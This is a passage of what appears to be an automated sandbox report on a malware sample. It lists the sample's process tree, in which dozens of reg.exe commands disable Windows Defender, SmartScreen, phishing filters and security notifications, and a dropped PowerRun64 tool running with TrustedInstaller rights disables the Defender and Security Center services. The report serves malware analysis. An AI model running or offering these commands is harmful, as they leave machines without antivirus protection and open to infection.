-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f3⤵PID:2668
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f3⤵PID:2684
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f3⤵PID:2732
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f3⤵PID:2080
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f3⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵PID:2660
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f3⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f3⤵PID:2096
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f3⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f3⤵PID:2712
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f3⤵PID:1132
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵PID:620
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f3⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f3⤵PID:584
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f3⤵PID:756
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f3⤵PID:2908
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f3⤵PID:2928
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f3⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f3⤵PID:2952
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f3⤵PID:2912
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f3⤵PID:2984
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f3⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f3⤵PID:2148
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f3⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1776
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1952
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1080
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1588
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1956
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1712
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f3⤵PID:1572
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f3⤵PID:1008
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f3⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f3⤵PID:2120
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f3⤵PID:2064
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f3⤵PID:2248
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f3⤵PID:2576
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f3⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f3⤵PID:2240
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f3⤵PID:1436
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f3⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f3⤵PID:2056
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f3⤵PID:2244
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f3⤵PID:2052
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f3⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f3⤵PID:2060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f3⤵PID:352
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f3⤵PID:308
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f3⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f3⤵PID:2072
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f3⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f3⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f3⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f3⤵PID:3036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f3⤵PID:1484
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f3⤵PID:748
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f3⤵PID:600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f3⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f3⤵PID:920
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f3⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f3⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f3⤵PID:1064
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f3⤵PID:752
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
PID:1172
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
PID:544
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f3⤵PID:1176
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2540 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1504 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3008 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2876 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2932 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:1712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:952 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:1476
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2144 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1960 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:1464
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1652 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2196
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1096 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2816 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2632
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2744 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:664
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2700 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2120
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2096 -
